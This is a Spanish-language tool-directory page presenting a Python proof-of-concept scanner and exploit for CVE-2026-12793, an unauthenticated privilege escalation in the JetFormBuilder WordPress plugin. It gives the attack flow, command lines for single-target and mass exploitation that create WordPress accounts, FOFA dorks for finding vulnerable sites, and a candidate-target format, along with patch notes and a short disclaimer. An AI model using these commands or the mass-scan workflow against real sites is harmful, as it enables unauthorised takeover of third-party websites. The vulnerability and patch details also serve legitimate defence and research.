Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/murrez/cve-2026-12793
Escalada de PrivilegiosReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónScripting y AutomatizaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHub
hace 11h 16mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
murrez/cve-2026-12793

CVE-2026-12793

Escáner PoC en Python y exploit para CVE-2026-12793, una escalada de privilegios no autenticada en JetFormBuilder <=3.6.2 que crea cuentas de administrador de WordPress.

Ver Repositorio

CVE-2026-12793 — Escalada de privilegios no autenticada en JetFormBuilder

Prueba de concepto, escáner y exploit para CVE-2026-12793 en el plugin de WordPress JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Pluginjetformbuilder
Afectados≤ 3.6.2
Corregido en3.6.2.1+
CVSS9.8 Crítico
AutenticaciónNo autenticada
CWECWE-269 — Gestión inadecuada de privilegios
Investigadordaroo (Wordfence)

Vulnerabilidad

El plugin no verifica que _jet_engine_booking_form_id haga referencia a un custom post type jet-form-builder publicado antes de cargar el contenido de bloques del post referenciado como esquema de formulario y ejecutar las acciones posteriores al envío.

Un atacante no autenticado puede enviar una petición AJAX manipulada para activar la acción Register User (wp_insert_user) y crear una nueva cuenta de WordPress. Si el formulario objetivo está mal configurado con un rol elevado (por ejemplo, administrator), esto conduce a la toma de control total del sitio.

Flujo del ataque

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Parche (3.6.2.1)

  • Block_Helper::is_valid_form_post() — solo se acepta el CPT jet-form-builder publicado
  • Form_Handler::set_form_id() rechaza IDs de formulario no válidos
  • Endurecimiento de la validación SSR (wp_insert_user / wp_update_user bloqueados como callbacks)

Requisitos

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

Uso

Objetivo único — comprobar

root@kitploit:~
python poc.py -u https://target.example --mode check

Escaneo masivo

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

Formatos de entrada: un dominio/URL por línea, CSV de FOFA (host,domain), o candidates.jsonl de una ejecución anterior.

Exploit (objetivo único)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Exploit masivo desde candidatos

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Opciones

Archivos de salida

ArchivoContenido
hits.txt

Ejemplo de entrada de candidato

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Los nombres de campo autodetectados son heurísticos. Verifique siempre y sobrescriba con --fields antes del exploit.

Detección / dorks de FOFA

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Comprobación de versión:

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

Busque Stable tag: ≤ 3.6.2.

Referencias

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no asumen ninguna responsabilidad por el uso indebido.

Licencia

MIT

Descargar herramienta
FlagDescripción
-u, --urlURL de objetivo único
--listArchivo de lista de objetivos
--modecheck (por defecto) o exploit
--form-idID de post de formulario JetFormBuilder conocido
--page-urlPágina que incrusta el formulario (referer), p. ej. /register/
--fieldsMapa de campos: login=x,email=y,password=z
--pathsRutas adicionales para rastrear en busca de formularios
--username / --email / --passwordCredenciales para el exploit (aleatorias si se omiten)
--verifyVerificar la cuenta mediante wp-login.php tras el envío
-j, --threadsHilos de trabajo (por defecto: 20)
--timeoutTiempo de espera HTTP en segundos (por defecto: 20)
--proxyURL del proxy HTTP(S)
--outputRegistro JSONL completo (por defecto: cve_2026_12793_results.jsonl)
--vuln-listLista de aciertos (por defecto: hits.txt)
--candidates-listJSONL de candidatos (por defecto: candidates.jsonl)
-q, --quietSolo salida de progreso
URLs de objetivos vulnerables / explotados
candidates.jsonlObjetivos con sonda Register User accesible (form_id, page_url, fields)
cve_2026_12793_results.jsonlResultados JSON completos por objetivo